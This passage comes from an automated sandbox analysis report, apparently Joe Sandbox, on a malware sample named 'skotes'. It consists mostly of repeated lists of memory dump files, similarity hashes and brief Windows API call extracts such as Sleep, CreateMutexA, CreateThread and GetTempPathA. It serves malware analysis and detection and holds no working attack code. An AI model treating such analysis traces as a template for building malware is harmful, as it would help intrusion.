                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d4a73de443da52d9e871f79e17711792e69edb7ef4a077b720f6b890a3bfb7ae
                                                                                                                                                                                                                                                                • Instruction ID: 281d3a655b82889e44a458e6f6d051d0f97e40e50a63cf793e76c8f1faa9b1c6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4a73de443da52d9e871f79e17711792e69edb7ef4a077b720f6b890a3bfb7ae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB21F8329051087BEB11AB68EE42B9F3769DF45378F100312F9256B3D1EB709E018661
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: c0633147bf9df2614b0f5be3612728a72606a788e5291a5d6feb5602e5d3d2a0
                                                                                                                                                                                                                                                                • Instruction ID: 5ba5af3f393911945b0e46270764d3ec54ef1f4324f45756842a5a450cc09e9f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0633147bf9df2614b0f5be3612728a72606a788e5291a5d6feb5602e5d3d2a0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E0CD3129E30095F61437A96989B2F73D8D7F6F06F310425F514C70D8DB61958185A3
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 3472027048-3739981918
                                                                                                                                                                                                                                                                • Opcode ID: 8fdb508c9b100fe3ceb08edcf60ad917f0b4703c8cf285051b9aa19c982c224f
                                                                                                                                                                                                                                                                • Instruction ID: dd672df6099eea94e682084893830add70d8f44dbc30a3ae3d5df318fa1ec218
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fdb508c9b100fe3ceb08edcf60ad917f0b4703c8cf285051b9aa19c982c224f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF0F971E00640BBC700BB788E07B5E7FB8EB07760F800758E411672E2DB741A0447D2
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00AB6D10
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00007530), ref: 00AB6D25
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateSleepThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4202482776-0
                                                                                                                                                                                                                                                                • Opcode ID: 848e50bee5320eaea3ff881f600da782cec6b11844f4478e2e8ab7d515cdb228
                                                                                                                                                                                                                                                                • Instruction ID: faddd9ce5311135dcc49415265de276449351d0df09324757870cd0a2aaf7e84
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 848e50bee5320eaea3ff881f600da782cec6b11844f4478e2e8ab7d515cdb228
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AD08C307C4314F6F37007A06C07FA6AE34AB0AF42F254840B34C3F0D285E8310086AC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?,61AD01A7,?,00000000), ref: 00AA8B77
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PathTemp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2920410445-0
                                                                                                                                                                                                                                                                • Opcode ID: aa29431b252151c1db008626b936a3c7cff0c43f55be1b99f9d99db73f645758
                                                                                                                                                                                                                                                                • Instruction ID: 0233f56758de06c29efe3417b423587640788a49d003da302bdf698173e5f306
